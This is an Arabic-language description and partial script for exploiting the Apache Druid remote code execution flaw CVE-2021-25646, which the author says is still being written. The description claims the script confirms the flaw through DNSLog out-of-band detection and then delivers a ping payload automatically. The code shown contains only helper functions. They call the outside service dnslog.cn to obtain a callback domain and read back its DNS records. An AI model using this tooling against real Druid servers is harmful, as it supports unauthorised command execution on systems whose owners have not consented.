
نص استغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache Druid CVE-2021-25646، باستخدام كشف خارج النطاق قائم على DNSLog وتسليم الحمولة تلقائيًا.
قيد الكتابة...
=====================================================================================
أولاً، أشكر الخبير Wker على الإجابة عن بُعد.
الهدف من كتابة النص هو التمرين.
يستخدم النص DNSLog للتحقق، فإذا وُجدت الثغرة، سيحصل تلقائياً على رابط dnslog وينفذ عملية ping، ثم يطبع النتيجة.
dns.wker في المسار script\ATTACKUTILS#define dnsqian = Set-Cookie:[
#define dnshou = path=/
#define re = "(.*?)"
function DnsRef(cookie){
res = HttpGet("http://dnslog.cn/getrecords.php?t=0.3741317873165926",cookie.StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
r = StrRe(res[0],re);
if(GetArrayNum(r) >= 3){
return r[3];
}else{
return "";
}
}
function GetDomain(){
array r;
res = HttpGet("http://dnslog.cn/getdomain.php?t=0.16082432252184475","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0");
tmp = StrSplit(res[0],StrRN());
dns = tmp[0];
cookie = "Cookie: ".GettextMiddle(res[1],dnsqian,dnshou);
ArrayAddEle(r,dns);
ArrayAddEle(r,cookie);
return r;
}
